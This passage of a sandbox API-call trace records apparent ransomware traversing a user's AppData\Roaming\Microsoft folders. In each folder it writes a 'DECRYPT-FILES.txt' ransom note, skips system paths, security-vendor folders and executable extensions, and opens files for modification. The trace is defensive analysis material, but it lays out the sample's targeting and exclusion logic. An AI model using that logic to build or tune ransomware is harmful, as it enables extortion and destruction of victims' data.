HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned 63 [0077.367] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.367] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\\\DECRYPT-FILES.txt") returned 81 [0077.367] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\addins\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.367] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.369] CloseHandle (hObject=0x44c) returned 1 [0077.369] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned 63 [0077.369] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\*" [0077.369] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c36290, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.369] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.369] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c36290, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.369] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.369] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.369] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa516e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.369] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.370] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa516e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.370] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.370] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.370] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.370] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.370] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.370] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.370] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.370] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.370] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.370] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.370] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.370] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.370] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.370] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.370] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.370] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned 63 [0077.370] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.370] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\" [0077.370] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\jkbimi8.tmp" [0077.370] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\addins\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.370] CloseHandle (hObject=0x0) returned 0 [0077.370] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.371] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa516e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.371] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.371] CloseHandle (hObject=0x448) returned 1 [0077.371] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0077.371] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0077.371] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0077.371] lstrcatW (in: lpString1="Credentials", lpString2="\\" | out: lpString1="Credentials\\") returned="Credentials\\" [0077.371] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Credentials\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\" [0077.371] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Program Files") returned 0x0 [0077.371] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch=":\\Windows") returned 0x0 [0077.371] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Games\\") returned 0x0 [0077.371] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.371] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.371] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.371] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.371] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.371] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\All Users") returned 0x0 [0077.372] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.372] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.372] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.372] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="AhnLab") returned 0x0 [0077.372] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.372] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 68 [0077.372] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.372] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\\\jkbimi8.tmp") returned 80 [0077.372] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\credentials\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.373] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 68 [0077.373] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.373] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\\\DECRYPT-FILES.txt") returned 86 [0077.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\credentials\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.373] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.374] CloseHandle (hObject=0x44c) returned 1 [0077.375] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 68 [0077.375] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0077.375] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.375] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.375] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.375] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.375] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.375] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa53cfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.375] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.375] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa516e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.375] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.375] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.375] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.375] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.375] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.375] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.375] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.375] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.375] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.375] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.375] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.376] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.376] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.376] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.376] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.376] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 68 [0077.376] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.376] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\" [0077.376] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\jkbimi8.tmp" [0077.376] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.376] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\credentials\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.376] CloseHandle (hObject=0x0) returned 0 [0077.376] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.376] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa516e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.376] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.377] CloseHandle (hObject=0x448) returned 1 [0077.377] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0077.377] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0077.377] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0077.377] lstrcatW (in: lpString1="Crypto", lpString2="\\" | out: lpString1="Crypto\\") returned="Crypto\\" [0077.377] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Crypto\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\" [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Program Files") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch=":\\Windows") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Games\\") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\All Users") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="AhnLab") returned 0x0 [0077.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.377] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 63 [0077.377] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.377] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\\\jkbimi8.tmp") returned 75 [0077.377] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.380] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 63 [0077.380] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.380] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\\\DECRYPT-FILES.txt") returned 81 [0077.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.380] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.381] CloseHandle (hObject=0x44c) returned 1 [0077.382] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 63 [0077.382] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0077.382] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 